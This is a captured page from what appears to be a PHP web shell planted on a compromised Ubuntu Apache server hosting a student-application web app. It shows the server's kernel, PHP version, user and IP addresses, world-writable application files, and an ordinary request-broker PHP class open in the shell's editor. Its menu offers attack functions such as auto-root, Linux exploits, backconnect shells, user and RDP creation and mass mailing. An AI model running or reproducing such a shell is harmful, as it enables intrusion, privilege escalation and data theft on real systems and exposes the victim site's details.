Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.116.15.124
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
dud /
adm /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationFormReportPOSTOFFIC...
19.27
KB
-rwxrwxrwx
applicationFormReportSBM.php
8.41
KB
-rwxrwxrwx
caccesscontext.php
1.24
KB
-rwxrwxrwx
cappcontext.php
2.66
KB
-rwxrwxrwx
code39.php
6.38
KB
-rwxrwxrwx
coutput.php
1.76
KB
-rwxrwxrwx
crequestbroker.php
2.49
KB
-rwxrwxrwx
csessions.php
514
B
-rwxrwxrwx
cuser.php
3.41
KB
-rwxrwxrwx
customappcontext.php
2.35
KB
-rwxrwxrwx
dropdown.php
844
B
-rwxrwxrwx
format.php
7.43
KB
-rwxrwxrwx
fpdf_protection.php
5.61
KB
-rwxrwxrwx
getdata.php
1.06
KB
-rwxrwxrwx
getnumword.php
7.15
KB
-rwxrwxrwx
json.php
33.2
KB
-rwxrwxrwx
kusphdadm.php
22.17
KB
-rwxrwxrwx
kusphdadm_02012019.php
17.81
KB
-rwxrwxrwx
kusphdadm_19082019.php
17.88
KB
-rwxrwxrwx
mregistry.php
3.83
KB
-rwxrwxrwx
re_rigistration.php
7.38
KB
-rwxrwxrwx
report_bulk_applications.php
24.21
KB
-rwxrwxrwx
report_bulk_applications_19082...
23.5
KB
-rwxrwxrwx
report_hall_ticket.php
11.31
KB
-rwxrwxrwx
reportapplicationform - Copy.p...
19.59
KB
-rwxrwxrwx
reportapplicationform.php
23.92
KB
-rwxrwxrwx
rotation.php
596
B
-rwxrwxrwx
saveApplication.php
8.91
KB
-rwxrwxrwx
saveRerigistration.php
10.87
KB
-rwxrwxrwx
student.php
14.89
KB
-rwxrwxrwx
student_19082019.php
14.75
KB
-rwxrwxrwx
student_24092018.php
13.3
KB
-rwxrwxrwx
subfeedetl.php
3.39
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : crequestbroker.php
<?php class CRequestBroker { # The important functions in the ORB are defined static, and hence # at the module level, the ORB can be accessed and functions executed private static $marr_actions = array(); private static $instance; private function __construct() { } public static function GetInstance() { if (!isset(self::$instance)) { $c = __CLASS__; self::$instance = new $c; } return self::$instance; } static function RegisterAction($astr_action, $astr_method) { $lbool_result = false; $larr_temp = self::$marr_actions; $lbool_result = array_key_exists($astr_action, self::$marr_actions); if (!$lbool_result) self::$marr_actions[$astr_action] = $astr_method; return (!$lbool_result); } static function UnregisterAction($astr_action) { $lbool_result = false; $lbool_result = array_key_exists($astr_action, self::$marr_actions); if ($lbool_result) unset(self::$marr_actions[$astr_action]); return ($lbool_result); } function Initialize() { self::$marr_actions = array(); } static function GetAllRegisteredActions() { return (self::$marr_actions); } function GetAction($astr_action) { $lstr_result = ""; if(array_key_exists($astr_action, self::$marr_actions)) $lstr_result = self::$marr_actions[$astr_action]; return ($lstr_result); } function ExecuteAction($astr_action, $aobj_data = NULL) { $lobj_result = false; $larr_method = null; $lstr_method = $this->GetAction($astr_action); if(!empty($lstr_method)) { # split & extract method details and execute $larr_method = explode(".",$lstr_method); #**** if the php file being included contains errors then executeaction will break #**** error handling code has been introduced in coutput.php require_once(APP_PATH_G . "/". $larr_method[0].".php"); # if(function_exists($larr_method[1])) call_user_func($larr_method[1],$aobj_data); else throw new Exception("Exception executing undefined action : $astr_action"); } else { print_r(self::$marr_actions); throw new Exception("Exception executing undefined action : $astr_action"); } return ($lobj_result); } } ?>
Close